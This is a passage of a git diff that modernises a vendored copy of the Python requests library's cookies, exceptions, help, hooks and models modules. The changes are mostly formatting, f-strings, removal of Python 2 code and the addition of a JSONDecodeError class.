+        host = to_native_string(self._r.headers["Host"], encoding="utf-8")
         parsed = urlparse(self._r.url)
         # Reconstruct the URL as we expect it
-        return urlunparse([
-            parsed.scheme, host, parsed.path, parsed.params, parsed.query,
-            parsed.fragment
-        ])
+        return urlunparse(
+            [
+                parsed.scheme,
+                host,
+                parsed.path,
+                parsed.params,
+                parsed.query,
+                parsed.fragment,
+            ]
+        )
 
     def is_unverifiable(self):
         return True
@@ -73,7 +77,9 @@ def get_header(self, name, default=None):
 
     def add_header(self, key, val):
         """cookielib has no legitimate use for this method; add it back if you find one."""
-        raise NotImplementedError("Cookie headers should be added with add_unredirected_header()")
+        raise NotImplementedError(
+            "Cookie headers should be added with add_unredirected_header()"
+        )
 
     def add_unredirected_header(self, name, value):
         self._new_headers[name] = value
@@ -94,7 +100,7 @@ def host(self):
         return self.get_host()
 
 
-class MockResponse(object):
+class MockResponse:
     """Wraps a `httplib.HTTPMessage` to mimic a `urllib.addinfourl`.
 
     ...what? Basically, expose the parsed HTTP headers from the server response
@@ -122,8 +128,7 @@ def extract_cookies_to_jar(jar, request, response):
     :param request: our own requests.Request object
     :param response: urllib3.HTTPResponse object
     """
-    if not (hasattr(response, '_original_response') and
-            response._original_response):
+    if not (hasattr(response, "_original_response") and response._original_response):
         return
     # the _original_response field is the wrapped httplib.HTTPResponse object,
     req = MockRequest(request)
@@ -140,7 +145,7 @@ def get_cookie_header(jar, request):
     """
     r = MockRequest(request)
     jar.add_cookie_header(r)
-    return r.get_new_headers().get('Cookie')
+    return r.get_new_headers().get("Cookie")
 
 
 def remove_cookie_by_name(cookiejar, name, domain=None, path=None):
@@ -205,7 +210,9 @@ def set(self, name, value, **kwargs):
         """
         # support client code that unsets cookies by assignment of a None value:
         if value is None:
-            remove_cookie_by_name(self, name, domain=kwargs.get('domain'), path=kwargs.get('path'))
+            remove_cookie_by_name(
+                self, name, domain=kwargs.get("domain"), path=kwargs.get("path")
+            )
             return
 
         if isinstance(value, Morsel):
@@ -305,16 +312,15 @@ def get_dict(self, domain=None, path=None):
         """
         dictionary = {}
         for cookie in iter(self):
-            if (
-                (domain is None or cookie.domain == domain) and
-                (path is None or cookie.path == path)
+            if (domain is None or cookie.domain == domain) and (
+                path is None or cookie.path == path
             ):
                 dictionary[cookie.name] = cookie.value
         return dictionary
 
     def __contains__(self, name):
         try:
-            return super(RequestsCookieJar, self).__contains__(name)
+            return super().__contains__(name)
         except CookieConflictError:
             return True
 
@@ -341,9 +347,13 @@ def __delitem__(self, name):
         remove_cookie_by_name(self, name)
 
     def set_cookie(self, cookie, *args, **kwargs):
-        if hasattr(cookie.value, 'startswith') and cookie.value.startswith('"') and cookie.value.endswith('"'):
-            cookie.value = cookie.value.replace('\\"', '')
-        return super(RequestsCookieJar, self).set_cookie(cookie, *args, **kwargs)
+        if (
+            hasattr(cookie.value, "startswith")
+            and cookie.value.startswith('"')
+            and cookie.value.endswith('"')
+        ):
+            cookie.value = cookie.value.replace('\\"', "")
+        return super().set_cookie(cookie, *args, **kwargs)
 
     def update(self, other):
         """Updates this jar with cookies from another CookieJar or dict-like"""
@@ -351,7 +361,7 @@ def update(self, other):
             for cookie in other:
                 self.set_cookie(copy.copy(cookie))
         else:
-            super(RequestsCookieJar, self).update(other)
+            super().update(other)
 
     def _find(self, name, domain=None, path=None):
         """Requests uses this method internally to get cookie values.
@@ -371,7 +381,7 @@ def _find(self, name, domain=None, path=None):
                     if path is None or cookie.path == path:
                         return cookie.value
 
-        raise KeyError('name=%r, domain=%r, path=%r' % (name, domain, path))
+        raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}")
 
     def _find_no_duplicates(self, name, domain=None, path=None):
         """Both ``__get_item__`` and ``get`` call this function: it's never
@@ -390,25 +400,29 @@ def _find_no_duplicates(self, name, domain=None, path=None):
             if cookie.name == name:
                 if domain is None or cookie.domain == domain:
                     if path is None or cookie.path == path:
-                        if toReturn is not None:  # if there are multiple cookies that meet passed in criteria
-                            raise CookieConflictError('There are multiple cookies with name, %r' % (name))
-                        toReturn = cookie.value  # we will eventually return this as long as no cookie conflict
+                        if toReturn is not None:
+                            # if there are multiple cookies that meet passed in criteria
+                            raise CookieConflictError(
+                                f"There are multiple cookies with name, {name!r}"
+                            )
+                        # we will eventually return this as long as no cookie conflict
+                        toReturn = cookie.value
 
         if toReturn:
             return toReturn
-        raise KeyError('name=%r, domain=%r, path=%r' % (name, domain, path))
+        raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}")
 
     def __getstate__(self):
         """Unlike a normal CookieJar, this class is pickleable."""
         state = self.__dict__.copy()
         # remove the unpickleable RLock object
-        state.pop('_cookies_lock')
+        state.pop("_cookies_lock")
         return state
 
     def __setstate__(self, state):
         """Unlike a normal CookieJar, this class is pickleable."""
         self.__dict__.update(state)
-        if '_cookies_lock' not in self.__dict__:
+        if "_cookies_lock" not in self.__dict__:
             self._cookies_lock = threading.RLock()
 
     def copy(self):
@@ -427,7 +441,7 @@ def _copy_cookie_jar(jar):
     if jar is None:
         return None
 
-    if hasattr(jar, 'copy'):
+    if hasattr(jar, "copy"):
         # We're dealing with an instance of RequestsCookieJar
         return jar.copy()
     # We're dealing with a generic CookieJar instance
@@ -445,31 +459,32 @@ def create_cookie(name, value, **kwargs):
     and sent on every request (this is sometimes called a "supercookie").
     """
     result = {
-        'version': 0,
-        'name': name,
-        'value': value,
-        'port': None,
-        'domain': '',
-        'path': '/',
-        'secure': False,
-        'expires': None,
-        'discard': True,
-        'comment': None,
-        'comment_url': None,
-        'rest': {'HttpOnly': None},
-        'rfc2109': False,
+        "version": 0,
+        "name": name,
+        "value": value,
+        "port": None,
+        "domain": "",
+        "path": "/",
+        "secure": False,
+        "expires": None,
+        "discard": True,
+        "comment": None,
+        "comment_url": None,
+        "rest": {"HttpOnly": None},
+        "rfc2109": False,
     }
 
     badargs = set(kwargs) - set(result)
     if badargs:
-        err = 'create_cookie() got unexpected keyword arguments: %s'
-        raise TypeError(err % list(badargs))
+        raise TypeError(
+            f"create_cookie() got unexpected keyword arguments: {list(badargs)}"
+        )
 
     result.update(kwargs)
-    result['port_specified'] = bool(result['port'])
-    result['domain_specified'] = bool(result['domain'])
-    result['domain_initial_dot'] = result['domain'].startswith('.')
-    result['path_specified'] = bool(result['path'])
+    result["port_specified"] = bool(result["port"])
+    result["domain_specified"] = bool(result["domain"])
+    result["domain_initial_dot"] = result["domain"].startswith(".")
+    result["path_specified"] = bool(result["path"])
 
     return cookielib.Cookie(**result)
 
@@ -478,30 +493,28 @@ def morsel_to_cookie(morsel):
     """Convert a Morsel object into a Cookie containing the one k/v pair."""
 
     expires = None
-    if morsel['max-age']:
+    if morsel["max-age"]:
         try:
-            expires = int(time.time() + int(morsel['max-age']))
+            expires = int(time.time() + int(morsel["max-age"]))
         except ValueError:
-            raise TypeError('max-age: %s must be integer' % morsel['max-age'])
-    elif morsel['expires']:
-        time_template = '%a, %d-%b-%Y %H:%M:%S GMT'
-        expires = calendar.timegm(
-            time.strptime(morsel['expires'], time_template)
-        )
+            raise TypeError(f"max-age: {morsel['max-age']} must be integer")
+    elif morsel["expires"]:
+        time_template = "%a, %d-%b-%Y %H:%M:%S GMT"
+        expires = calendar.timegm(time.strptime(morsel["expires"], time_template))
     return create_cookie(
-        comment=morsel['comment'],
-        comment_url=bool(morsel['comment']),
+        comment=morsel["comment"],
+        comment_url=bool(morsel["comment"]),
         discard=False,
-        domain=morsel['domain'],
+        domain=morsel["domain"],
         expires=expires,
         name=morsel.key,
-        path=morsel['path'],
+        path=morsel["path"],
         port=None,
-        rest={'HttpOnly': morsel['httponly']},
+        rest={"HttpOnly": morsel["httponly"]},
         rfc2109=False,
-        secure=bool(morsel['secure']),
+        secure=bool(morsel["secure"]),
         value=morsel.value,
-        version=morsel['version'] or 0,
+        version=morsel["version"] or 0,
     )
 
 
@@ -534,11 +547,10 @@ def merge_cookies(cookiejar, cookies):
     :rtype: CookieJar
     """
     if not isinstance(cookiejar, cookielib.CookieJar):
-        raise ValueError('You can only merge into CookieJar')
+        raise ValueError("You can only merge into CookieJar")
 
     if isinstance(cookies, dict):
-        cookiejar = cookiejar_from_dict(
-            cookies, cookiejar=cookiejar, overwrite=False)
+        cookiejar = cookiejar_from_dict(cookies, cookiejar=cookiejar, overwrite=False)
     elif isinstance(cookies, cookielib.CookieJar):
         try:
             cookiejar.update(cookies)
diff --git a/thirdparty/requests/exceptions.py b/thirdparty/requests/exceptions.py
index c412ec9..e1cedf8 100644
--- a/thirdparty/requests/exceptions.py
+++ b/thirdparty/requests/exceptions.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
 requests.exceptions
 ~~~~~~~~~~~~~~~~~~~
@@ -8,6 +6,8 @@
 """
 from urllib3.exceptions import HTTPError as BaseHTTPError
 
+from .compat import JSONDecodeError as CompatJSONDecodeError
+
 
 class RequestException(IOError):
     """There was an ambiguous exception that occurred while handling your
@@ -16,19 +16,32 @@ class RequestException(IOError):
 
     def __init__(self, *args, **kwargs):
         """Initialize RequestException with `request` and `response` objects."""
-        response = kwargs.pop('response', None)
+        response = kwargs.pop("response", None)
         self.response = response
-        self.request = kwargs.pop('request', None)
-        if (response is not None and not self.request and
-                hasattr(response, 'request')):
+        self.request = kwargs.pop("request", None)
+        if response is not None and not self.request and hasattr(response, "request"):
             self.request = self.response.request
-        super(RequestException, self).__init__(*args, **kwargs)
+        super().__init__(*args, **kwargs)
 
 
 class InvalidJSONError(RequestException):
     """A JSON error occurred."""
 
 
+class JSONDecodeError(InvalidJSONError, CompatJSONDecodeError):
+    """Couldn't decode the text into json"""
+
+    def __init__(self, *args, **kwargs):
+        """
+        Construct the JSONDecodeError instance first with all
+        args. Then use it's args to construct the IOError so that
+        the json specific args aren't used as IOError specific args
+        and the error message from JSONDecodeError is preserved.
+        """
+        CompatJSONDecodeError.__init__(self, *args)
+        InvalidJSONError.__init__(self, *self.args, **kwargs)
+
+
 class HTTPError(RequestException):
     """An HTTP error occurred."""
 
@@ -74,11 +87,11 @@ class TooManyRedirects(RequestException):
 
 
 class MissingSchema(RequestException, ValueError):
-    """The URL schema (e.g. http or https) is missing."""
+    """The URL scheme (e.g. http or https) is missing."""
 
 
 class InvalidSchema(RequestException, ValueError):
-    """See defaults.py for valid schemas."""
+    """The URL scheme provided is either invalid or unsupported."""
 
 
 class InvalidURL(RequestException, ValueError):
@@ -112,6 +125,7 @@ class RetryError(RequestException):
 class UnrewindableBodyError(RequestException):
     """Requests encountered an error when trying to rewind a body."""
 
+
 # Warnings
 
 
diff --git a/thirdparty/requests/help.py b/thirdparty/requests/help.py
index 4cd6389..8fbcd65 100644
--- a/thirdparty/requests/help.py
+++ b/thirdparty/requests/help.py
@@ -1,10 +1,9 @@
 """Module containing bug report helper(s)."""
-from __future__ import print_function
 
 import json
 import platform
-import sys
 import ssl
+import sys
 
 import idna
 import urllib3
@@ -28,16 +27,16 @@
     OpenSSL = None
     cryptography = None
 else:
-    import OpenSSL
     import cryptography
+    import OpenSSL
 
 
 def _implementation():
     """Return a dict with the Python implementation and version.
 
     Provide both the name and the version of the Python implementation
-    currently running. For example, on CPython 2.7.5 it will return
-    {'name': 'CPython', 'version': '2.7.5'}.
+    currently running. For example, on CPython 3.10.3 it will return
+    {'name': 'CPython', 'version': '3.10.3'}.
 
     This function works best on CPython and PyPy: in particular, it probably
     doesn't work for Jython or IronPython. Future investigation should be done
@@ -45,83 +44,83 @@ def _implementation():
     """
     implementation = platform.python_implementation()
 
-    if implementation == 'CPython':
+    if implementation == "CPython":
         implementation_version = platform.python_version()
-    elif implementation == 'PyPy':
-        implementation_version = '%s.%s.%s' % (sys.pypy_version_info.major,
-                                               sys.pypy_version_info.minor,
-                                               sys.pypy_version_info.micro)
-        if sys.pypy_version_info.releaselevel != 'final':
-            implementation_version = ''.join([
-                implementation_version, sys.pypy_version_info.releaselevel
-            ])
-    elif implementation == 'Jython':
+    elif implementation == "PyPy":
+        implementation_version = "{}.{}.{}".format(
+            sys.pypy_version_info.major,
+            sys.pypy_version_info.minor,
+            sys.pypy_version_info.micro,
+        )
+        if sys.pypy_version_info.releaselevel != "final":
+            implementation_version = "".join(
+                [implementation_version, sys.pypy_version_info.releaselevel]
+            )
+    elif implementation == "Jython":
         implementation_version = platform.python_version()  # Complete Guess
-    elif implementation == 'IronPython':
+    elif implementation == "IronPython":
         implementation_version = platform.python_version()  # Complete Guess
     else:
-        implementation_version = 'Unknown'
+        implementation_version = "Unknown"
 
-    return {'name': implementation, 'version': implementation_version}
+    return {"name": implementation, "version": implementation_version}
 
 
 def info():
     """Generate information for a bug report."""
     try:
         platform_info = {
-            'system': platform.system(),
-            'release': platform.release(),
+            "system": platform.system(),
+            "release": platform.release(),
         }
-    except IOError:
+    except OSError:
         platform_info = {
-            'system': 'Unknown',
-            'release': 'Unknown',
+            "system": "Unknown",
+            "release": "Unknown",
         }
 
     implementation_info = _implementation()
-    urllib3_info = {'version': urllib3.__version__}
-    charset_normalizer_info = {'version': None}
-    chardet_info = {'version': None}
+    urllib3_info = {"version": urllib3.__version__}
+    charset_normalizer_info = {"version": None}
+    chardet_info = {"version": None}
     if charset_normalizer:
-        charset_normalizer_info = {'version': charset_normalizer.__version__}
+        charset_normalizer_info = {"version": charset_normalizer.__version__}
     if chardet:
-        chardet_info = {'version': chardet.__version__}
+        chardet_info = {"version": chardet.__version__}
 
     pyopenssl_info = {
-        'version': None,
-        'openssl_version': '',
+        "version": None,
+        "openssl_version": "",
     }
     if OpenSSL:
         pyopenssl_info = {
-            'version': OpenSSL.__version__,
-            'openssl_version': '%x' % OpenSSL.SSL.OPENSSL_VERSION_NUMBER,
+            "version": OpenSSL.__version__,
+            "openssl_version": f"{OpenSSL.SSL.OPENSSL_VERSION_NUMBER:x}",
         }
     cryptography_info = {
-        'version': getattr(cryptography, '__version__', ''),
+        "version": getattr(cryptography, "__version__", ""),
     }
     idna_info = {
-        'version': getattr(idna, '__version__', ''),
+        "version": getattr(idna, "__version__", ""),
     }
 
     system_ssl = ssl.OPENSSL_VERSION_NUMBER
-    system_ssl_info = {
-        'version': '%x' % system_ssl if system_ssl is not None else ''
-    }
+    system_ssl_info = {"version": f"{system_ssl:x}" if system_ssl is not None else ""}
 
     return {
-        'platform': platform_info,
-        'implementation': implementation_info,
-        'system_ssl': system_ssl_info,
-        'using_pyopenssl': pyopenssl is not None,
-        'using_charset_normalizer': chardet is None,
-        'pyOpenSSL': pyopenssl_info,
-        'urllib3': urllib3_info,
-        'chardet': chardet_info,
-        'charset_normalizer': charset_normalizer_info,
-        'cryptography': cryptography_info,
-        'idna': idna_info,
-        'requests': {
-            'version': requests_version,
+        "platform": platform_info,
+        "implementation": implementation_info,
+        "system_ssl": system_ssl_info,
+        "using_pyopenssl": pyopenssl is not None,
+        "using_charset_normalizer": chardet is None,
+        "pyOpenSSL": pyopenssl_info,
+        "urllib3": urllib3_info,
+        "chardet": chardet_info,
+        "charset_normalizer": charset_normalizer_info,
+        "cryptography": cryptography_info,
+        "idna": idna_info,
+        "requests": {
+            "version": requests_version,
         },
     }
 
@@ -131,5 +130,5 @@ def main():
     print(json.dumps(info(), sort_keys=True, indent=2))
 
 
-if __name__ == '__main__':
+if __name__ == "__main__":
     main()
diff --git a/thirdparty/requests/hooks.py b/thirdparty/requests/hooks.py
index 7a51f21..d181ba2 100644
--- a/thirdparty/requests/hooks.py
+++ b/thirdparty/requests/hooks.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
 requests.hooks
 ~~~~~~~~~~~~~~
@@ -11,12 +9,13 @@
 ``response``:
     The response generated from a Request.
 """
-HOOKS = ['response']
+HOOKS = ["response"]
 
 
 def default_hooks():
     return {event: [] for event in HOOKS}
 
+
 # TODO: response is the only one
 
 
@@ -25,7 +24,7 @@ def dispatch_hook(key, hooks, hook_data, **kwargs):
     hooks = hooks or {}
     hooks = hooks.get(key)
     if hooks:
-        if hasattr(hooks, '__call__'):
+        if hasattr(hooks, "__call__"):
             hooks = [hooks]
         for hook in hooks:
             _hook_data = hook(hook_data, **kwargs)
diff --git a/thirdparty/requests/models.py b/thirdparty/requests/models.py
index aa6fb86..3cd49f5 100644
--- a/thirdparty/requests/models.py
+++ b/thirdparty/requests/models.py
@@ -1,5 +1,3 @@
-# -*- coding: utf-8 -*-
-
 """
 requests.models
 ~~~~~~~~~~~~~~~
@@ -8,46 +6,72 @@
 """
 
 import datetime
-import sys
 
 # Import encoding now, to avoid implicit import later.
 # Implicit import within threads may cause LookupError when standard library is in a ZIP,
 # such as in Embedded Python. See https://github.com/psf/requests/issues/3578.
-import encodings.idna
+import encodings.idna  # noqa: F401
+from io import UnsupportedOperation
 
+from urllib3.exceptions import (
+    DecodeError,
+    LocationParseError,
+    ProtocolError,
+    ReadTimeoutError,
+    SSLError,
+)
 from urllib3.fields import RequestField
 from urllib3.filepost import encode_multipart_formdata
 from urllib3.util import parse_url
-from urllib3.exceptions import (
-    DecodeError, ReadTimeoutError, ProtocolError, LocationParseError)
-
-from io import UnsupportedOperation
-from .hooks import default_hooks
-from .structures import CaseInsensitiveDict
 
-from .auth import HTTPBasicAuth
-from .cookies import cookiejar_from_dict, get_cookie_header, _copy_cookie_jar
-from .exceptions import (
-    HTTPError, MissingSchema, InvalidURL, ChunkedEncodingError,
-    ContentDecodingError, ConnectionError, StreamConsumedError, InvalidJSONError)
 from ._internal_utils import to_native_string, unicode_is_ascii
-from .utils import (
-    guess_filename, get_auth_from_url, requote_uri,
-    stream_decode_response_unicode, to_key_val_list, parse_header_links,
-    iter_slices, guess_json_utf, super_len, check_header_validity)
+from .auth import HTTPBasicAuth
 from .compat import (
-    Callable, Mapping,
-    cookielib, urlunparse, urlsplit, urlencode, str, bytes,
-    is_py2, chardet, builtin_str, basestring)
+    Callable,
+    JSONDecodeError,
+    Mapping,
+    basestring,
+    builtin_str,
+    chardet,
+    cookielib,
+)
 from .compat import json as complexjson
+from .compat import urlencode, urlsplit, urlunparse
+from .cookies import _copy_cookie_jar, cookiejar_from_dict, get_cookie_header
+from .exceptions import (
+    ChunkedEncodingError,
+    ConnectionError,
+    ContentDecodingError,
+    HTTPError,
+    InvalidJSONError,
+    InvalidURL,
+)
+from .exceptions import JSONDecodeError as RequestsJSONDecodeError
+from .exceptions import MissingSchema
+from .exceptions import SSLError as RequestsSSLError
+from .exceptions import StreamConsumedError
+from .hooks import default_hooks
 from .status_codes import codes
+from .structures import CaseInsensitiveDict
+from .utils import (
+    check_header_validity,
+    get_auth_from_url,
+    guess_filename,
+    guess_json_utf,
+    iter_slices,
+    parse_header_links,
+    requote_uri,
+    stream_decode_response_unicode,
+    super_len,
+    to_key_val_list,
+)
 
 #: The set of HTTP status codes that indicate an automatically
 #: processable redirect.
 REDIRECT_STATI = (
-    codes.moved,               # 301
-    codes.found,               # 302
-    codes.other,               # 303
+    codes.moved,  # 301
+    codes.found,  # 302
+    codes.other,  # 303
     codes.temporary_redirect,  # 307
     codes.permanent_redirect,  # 308
 )
@@ -57,7 +81,7 @@
 ITER_CHUNK_SIZE = 512
 
 
-class RequestEncodingMixin(object):
+class RequestEncodingMixin:
     @property
     def path_url(self):
         """Build the path URL to use."""
@@ -68,16 +92,16 @@ def path_url(self):
 
         path = p.path
         if not path:
-            path = '/'
+            path = "/"
 
         url.append(path)
 
         query = p.query
         if query:
-            url.append('?')
+            url.append("?")
             url.append(query)
 
-        return ''.join(url)
+        return "".join(url)
 
     @staticmethod
     def _encode_params(data):
@@ -90,18 +114,21 @@ def _encode_params(data):
 
         if isinstance(data, (str, bytes)):
             return data
-        elif hasattr(data, 'read'):
+        elif hasattr(data, "read"):
             return data
-        elif hasattr(data, '__iter__'):
+        elif hasattr(data, "__iter__"):
             result = []
             for k, vs in to_key_val_list(data):
-                if isinstance(vs, basestring) or not hasattr(vs, '__iter__'):
+                if isinstance(vs, basestring) or not hasattr(vs, "__iter__"):
                     vs = [vs]
                 for v in vs:
                     if v is not None:
                         result.append(
-                            (k.encode('utf-8') if isinstance(k, str) else k,
-                             v.encode('utf-8') if isinstance(v, str) else v))
+                            (
+                                k.encode("utf-8") if isinstance(k, str) else k,
+                                v.encode("utf-8") if isinstance(v, str) else v,
+                            )
+                        )
             return urlencode(result, doseq=True)
         else:
             return data
@@ -116,7 +143,7 @@ def _encode_files(files, data):
         The tuples may be 2-tuples (filename, fileobj), 3-tuples (filename, fileobj, contentype)
         or 4-tuples (filename, fileobj, contentype, custom_headers).
         """
-        if (not files):
+        if not files:
             raise ValueError("Files must be provided.")
         elif isinstance(data, basestring):
             raise ValueError("Data must not be a string.")
@@ -126,7 +153,7 @@ def _encode_files(files, data):
         files = to_key_val_list(files or {})
 
         for field, val in fields:
-            if isinstance(val, basestring) or not hasattr(val, '__iter__'):
+            if isinstance(val, basestring) or not hasattr(val, "__iter__"):
                 val = [val]
             for v in val:
                 if v is not None:
@@ -135,8 +162,13 @@ def _encode_files(files, data):
                         v = str(v)
 
                     new_fields.append(
-                        (field.decode('utf-8') if isinstance(field, bytes) else field,
-                         v.encode('utf-8') if isinstance(v, str) else v))
+                        (
+                            field.decode("utf-8")
+                            if isinstance(field, bytes)
+                            else field,
+                            v.encode("utf-8") if isinstance(v, str) else v,
+                        )
+                    )
 
         for (k, v) in files:
             # support for explicit filename
@@ -155,7 +187,7 @@ def _encode_files(files, data):
 
             if isinstance(fp, (str, bytes, bytearray)):
                 fdata = fp
-            elif hasattr(fp, 'read'):
+            elif hasattr(fp, "read"):
                 fdata = fp.read()
             elif fp is None:
                 continue
@@ -171,16 +203,16 @@ def _encode_files(files, data):
         return body, content_type
 
 
-class RequestHooksMixin(object):
+class RequestHooksMixin:
     def register_hook(self, event, hook):
         """Properly register a hook."""
 
         if event not in self.hooks:
-            raise ValueError('Unsupported event specified, with event name "%s"' % (event))
+            raise ValueError(f'Unsupported event specified, with event name "{event}"')
 
         if isinstance(hook, Callable):
             self.hooks[event].append(hook)
-        elif hasattr(hook, '__iter__'):
+        elif hasattr(hook, "__iter__"):
             self.hooks[event].extend(h for h in hook if isinstance(h, Callable))
 
     def deregister_hook(self, event, hook):
@@ -223,9 +255,19 @@ class Request(RequestHooksMixin):
       <PreparedRequest [GET]>
     """
 
-    def __init__(self,
-            method=None, url=None, headers=None, files=None, data=None,
-            params=None, auth=None, cookies=None, hooks=None, json=None):
+    def __init__(
+        self,
+        method=None,
+        url=None,
+        headers=None,
+        files=None,
+        data=None,
+        params=None,
+        auth=None,
+        cookies=None,
+        hooks=None,
+        json=None,
+    ):
 
         # Default empty dicts for dict params.
         data = [] if data is None else data
@@ -249,7 +291,7 @@ def __init__(self,
         self.cookies = cookies
 
     def __repr__(self):
-        return '<Request [%s]>' % (self.method)
+        return f"<Request [{self.method}]>"
 
     def prepare(self):
         """Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it."""
@@ -307,9 +349,19 @@ def __init__(self):
         #: integer denoting starting position of a readable file-like body.
         self._body_position = None
 
-    def prepare(self,
-            method=None, url=None, headers=None, files=None, data=None,
-            params=None, auth=None, cookies=None, hooks=None, json=None):
+    def prepare(
+        self,
+        method=None,
+        url=None,
+        headers=None,
+        files=None,
+        data=None,
+        params=None,
+        auth=None,
+        cookies=None,
+        hooks=None,
+        json=None,
+    ):
         """Prepares the entire request with the given parameters."""
 
         self.prepare_method(method)
@@ -326,7 +378,7 @@ def prepare(self,
         self.prepare_hooks(hooks)
 
     def __repr__(self):
-        return '<PreparedRequest [%s]>' % (self.method)
+        return f"<PreparedRequest [{self.method}]>"
 
     def copy(self):
         p = PreparedRequest()
@@ -350,7 +402,7 @@ def _get_idna_encoded_host(host):
         import idna
 
         try:
-            host = idna.encode(host, uts46=True).decode('utf-8')
+            host = idna.encode(host, uts46=True).decode("utf-8")
         except idna.IDNAError:
             raise UnicodeError
         return host
@@ -363,9 +415,9 @@ def prepare_url(self, url, params):
         #: on python 3.x.
         #: https://github.com/psf/requests/pull/2238
         if isinstance(url, bytes):
-            url = url.decode('utf8')
+            url = url.decode("utf8")
         else:
-            url = unicode(url) if is_py2 else str(url)
+            url = str(url)
 
         # Remove leading whitespaces from url
         url = url.lstrip()
@@ -373,7 +425,7 @@ def prepare_url(self, url, params):
         # Don't do any URL preparation for non-HTTP schemes like `mailto`,
         # `data` etc to work around exceptions from `url_parse`, which
         # handles RFC 3986 only.
-        if ':' in url and not url.lower().startswith('http'):
+        if ":" in url and not url.lower().startswith("http"):
             self.url = url
             return
 
@@ -384,13 +436,13 @@ def prepare_url(self, url, params):
             raise InvalidURL(*e.args)
 
         if not scheme:
-            error = ("Invalid URL {0!r}: No schema supplied. Perhaps you meant http://{0}?")
-            error = error.format(to_native_string(url, 'utf8'))
-
-            raise MissingSchema(error)
+            raise MissingSchema(
+                f"Invalid URL {url!r}: No scheme supplied. "
+                f"Perhaps you meant http://{url}?"
+            )
 
         if not host:
-            raise InvalidURL("Invalid URL %r: No host supplied" % url)
+            raise InvalidURL(f"Invalid URL {url!r}: No host supplied")
 
         # In general, we want to try IDNA encoding the hostname if the string contains
         # non-ASCII characters. This allows users to automatically get the correct IDNA
@@ -400,33 +452,21 @@ def prepare_url(self, url, params):
             try:
                 host = self._get_idna_encoded_host(host)
             except UnicodeError:
-                raise InvalidURL('URL has an invalid label.')
-        elif host.startswith(u'*'):
-            raise InvalidURL('URL has an invalid label.')
+                raise InvalidURL("URL has an invalid label.")
+        elif host.startswith(("*", ".")):
+            raise InvalidURL("URL has an invalid label.")
 
         # Carefully reconstruct the network location
-        netloc = auth or ''
+        netloc = auth or ""
         if netloc:
-            netloc += '@'
+            netloc += "@"
         netloc += host
         if port:
-            netloc += ':' + str(port)
+            netloc += f":{port}"
 
         # Bare domains aren't valid URLs.
         if not path:
-            path = '/'
-
-        if is_py2:
-            if isinstance(scheme, str):
-                scheme = scheme.encode('utf-8')
-            if isinstance(netloc, str):
-                netloc = netloc.encode('utf-8')
-            if isinstance(path, str):
-                path = path.encode('utf-8')
-            if isinstance(query, str):
-                query = query.encode('utf-8')
-            if isinstance(fragment, str):
-                fragment = fragment.encode('utf-8')
+            path = "/"
 
         if isinstance(params, (str, bytes)):
             params = to_native_string(params)
@@ -434,7 +474,7 @@ def prepare_url(self, url, params):
         enc_params = self._encode_params(params)
         if enc_params:
             if query:
-                query = '%s&%s' % (query, enc_params)
+                query = f"{query}&{enc_params}"
             else:
                 query = enc_params
 
@@ -465,20 +505,22 @@ def prepare_body(self, data, files, json=None):
         if not data and json is not None:
             # urllib3 requires a bytes-like body. Python 2's json.dumps
             # provides this natively, but Python 3 gives a Unicode string.
-            content_type = 'application/json'
+            content_type = "application/json"
 
             try:
-              body = complexjson.dumps(json, allow_nan=False)
+                body = complexjson.dumps(json, allow_nan=False)
             except ValueError as ve:
-              raise InvalidJSONError(ve, request=self)
+                raise InvalidJSONError(ve, request=self)
 
             if not isinstance(body, bytes):
-                body = body.encode('utf-8')
+                body = body.encode("utf-8")
 
-        is_stream = all([
-            hasattr(data, '__iter__'),
-            not isinstance(data, (basestring, list, tuple, Mapping))
-        ])
+        is_stream = all(
+            [
+                hasattr(data, "__iter__"),
+                not isinstance(data, (basestring, list, tuple, Mapping)),
+            ]
+        )
 
         if is_stream:
             try:
@@ -488,24 +530,26 @@ def prepare_body(self, data, files, json=None):
 
             body = data
 
-            if getattr(body, 'tell', None) is not None:
+            if getattr(body, "tell", None) is not None:
                 # Record the current file position before reading.
                 # This will allow us to rewind a file in the event
                 # of a redirect.
                 try:
                     self._body_position = body.tell()
-                except (IOError, OSError):
+                except OSError:
                     # This differentiates from None, allowing us to catch
                     # a failed `tell()` later when trying to rewind the body
                     self._body_position = object()
 
             if files:
-                raise NotImplementedError('Streamed bodies and files are mutually exclusive.')
+                raise NotImplementedError(
+                    "Streamed bodies and files are mutually exclusive."
+                )
 
             if length:
-                self.headers['Content-Length'] = builtin_str(length)
+                self.headers["Content-Length"] = builtin_str(length)
             else:
-                self.headers['Transfer-Encoding'] = 'chunked'
+                self.headers["Transfer-Encoding"] = "chunked"
         else:
             # Multi-part file uploads.
             if files:
@@ -513,16 +557,16 @@ def prepare_body(self, data, files, json=None):
             else:
                 if data:
                     body = self._encode_params(data)
-                    if isinstance(data, basestring) or hasattr(data, 'read'):
+                    if isinstance(data, basestring) or hasattr(data, "read"):
                         content_type = None
                     else:
-                        content_type = 'application/x-www-form-urlencoded'
+                        content_type = "application/x-www-form-urlencoded"
 
             self.prepare_content_length(body)
 
             # Add content-type if it wasn't explicitly provided.
-            if content_type and ('content-type' not in self.headers):
-                self.headers['Content-Type'] = content_type
+            if content_type and ("content-type" not in self.headers):
+                self.headers["Content-Type"] = content_type
 
         self.body = body
 
@@ -533,13 +577,16 @@ def prepare_content_length(self, body):
             if length:
                 # If length exists, set it. Otherwise, we fallback
                 # to Transfer-Encoding: chunked.
-                self.headers['Content-Length'] = builtin_str(length)
-        elif self.method not in ('GET', 'HEAD') and self.headers.get('Content-Length') is None:
+                self.headers["Content-Length"] = builtin_str(length)
+        elif (
+            self.method not in ("GET", "HEAD")
+            and self.headers.get("Content-Length") is None
+        ):
             # Set Content-Length to 0 for methods that can have a body
             # but don't provide one. (i.e. not GET or HEAD)
-            self.headers['Content-Length'] = '0'
+            self.headers["Content-Length"] = "0"
 
-    def prepare_auth(self, auth, url=''):
+    def prepare_auth(self, auth, url=""):
         """Prepares the given HTTP auth data."""
 
         # If no Auth is explicitly provided, extract it from the URL first.
@@ -579,7 +626,7 @@ def prepare_cookies(self, cookies):
 
         cookie_header = get_cookie_header(self._cookies, self)
         if cookie_header is not None:
-            self.headers['Cookie'] = cookie_header
+            self.headers["Cookie"] = cookie_header
 
     def prepare_hooks(self, hooks):
